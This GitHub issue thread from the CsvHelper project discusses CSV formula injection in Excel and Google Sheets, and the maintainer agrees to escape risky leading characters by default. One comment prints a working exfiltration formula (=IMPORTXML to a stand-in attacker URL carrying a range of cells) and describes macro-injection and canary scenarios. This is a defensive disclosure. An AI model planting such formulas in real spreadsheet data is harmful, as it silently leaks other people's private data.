### ISSUE TITLE
Outputting string cells starting with certain characters breaks Excel/Google Sheets

### ISSUE THREAD

**Issue by togakangaroo** [JoshClose/CsvHelper#724]
This is more a fault of Excel/Google Sheets but, [if you start a cell with `+` or `=` - even if quoted - Excel and Google Sheets will try to interpret it as a formula](https://superuser.com/questions/318420/formatting-a-comma-delimited-csv-to-force-excel-to-interpret-value-as-a-string/318421#318421).

The solution seems to be to quote the cell *and prefix the first character (inside the quotes) with a tab*.

Can we create a mode which would do this? Is this something you would be interested in a PR for? (there seems to be a ton of open PRs...)

**Comment by JoshClose** [comment]
All Excel stuff has been moved out of the core. There will be another project in the contrib library that will handle Excel things.

**Comment by JoshClose** [comment]
This issue was moved to CsvHelperContrib/CsvHelperContrib#8

**Comment by togakangaroo** [comment]
Shit, I can't believe I forgot to follow up on this.

I've been researching a lot of the issue and even submitting bug reports. This is *not* just an excel thing. Google sheets is absolutely vulnerable to the same thing along a slightly different vector.

So to summarize, here is the situations where this is super duper dangerous:

You have an application which takes in user data which an administrator can export in csv format (ie "every application").

* A user submits a macro injection attack into a cell. The administrator gets warned, but the Excel warning specifically says to only allow if you trust the source. And the source is their own app, and what they know to be a executionless text-file so they do trust it! Bam, your computer is compromised.

* The administrator is wise to the above. They only open csv files up in google sheets. Macro injection is not possible there. Except what _is_ possible is to steal all the data in the sheet for example with a cell that contains 

```
=IMPORTXML(CONCAT("https://some-url-attackers-log.com?data=", CONCATENATE(A1:A999)))
```

when you do that - no warnings - it just sends all the private data of all users to the attacker's site. This is especially bad in google sheets - since this is running under the administrator's account, all they need to know is an id for any *other* sheet they have access to (eg company financials or client lists) and they can steal that data as well. I've filed this issue with Google, but no solution yet. Also this works with Excel (again, no warnings)

* A security researcher who for example is helping the authorities investigate a criminal organization or terrorist ring. They take a dump of text messages or some other data via csv to examine (this is what the security guys I've talked to actually do btw). Inside one of those messages is a canary using the same technique as above. Now boom! the people under investigation have been tipped off  that this is the case. Hey look, [someone is actually doing this already](http://www.thedailybeast.com/this-is-how-cops-trick-dark-web-drug-dealers-into-unmasking-themselves)

I realize its kinda unfair to drop this at your feet. This is not an error in CsvHelper - its an error in Excel and Sheets and to some degree a failure of the CSV (lack of a) spec. However, no developer I've talked to knows about this, you can do something about it, and as I've outlined above, the implications are _so_ damaging that I don't think this should be a contrib issue.

**Comment by JoshClose** [comment]
OK. What is the fix for both Excel and Sheets (and OO Calc)? `"=field"`?

or just

> The solution seems to be to quote the cell and prefix the first character (inside the quotes) with a tab.

Will this make it so all fields are read as strings in Excel? What if the user does want to have numbers; does this just not make that possible in favor of not having possibly bad data?

**Comment by togakangaroo** [comment]
for any field that begins with `=`,`@`,`-`, or `+` (and I hope I didn't miss any, but that seems to be the list so far) you would prefix it with a tab. This goes insides the quotes if there are quotes, but it has to be the first character of the cell data

    123,\t=2+3,foo
    123,"\t=2+3",foo

Yes, this should affect Open Office as well, though I haven't tested it personally. It does *not* as best as I can tell affect Numbers on OSX, and unfortunately there the tab spacing is visible (it is not in Excel or GSheets)

So to address that situation as well as what you bring up, I propose to have this feature to be opt-out rather than opt-in (by installing contrib). Secure by default, permissive by configuration. This would also allow you to sub out the character used if you don't want the tab char for example (space also works but shows up everywhere).

Btw, I have a feeling like a unicode zero-width char might also work, but never got a chance to test that.

**Comment by JoshClose** [comment]
I'll add this and have it on by default.

So to summarize:

`=field` -> `\t=field`
`"=field"` => `"\t=field"`

`=` has to be first char or second char if first char is `"`

`=` can be any of these chars `=` `@` `-` `+`

**Comment by JoshClose** [comment]
I have a unit test breaking because the field is a negative number.

**Comment by togakangaroo** [comment]
not sure what you mean by that, if you want I can check out a commit and take a look.

I'd argue that if a CSV file contains `-2` then it is correct for excel or anything else to interpret that as a string until someone explicitly tells that column to be validated differently

**Comment by JoshClose** [comment]
Good points. I just wanted your thoughts on it. I should have been more clear. ;)

**Comment by JoshClose** [comment]
434e6ca6c6eecf2ca154ac99142e0282bb68e2f9
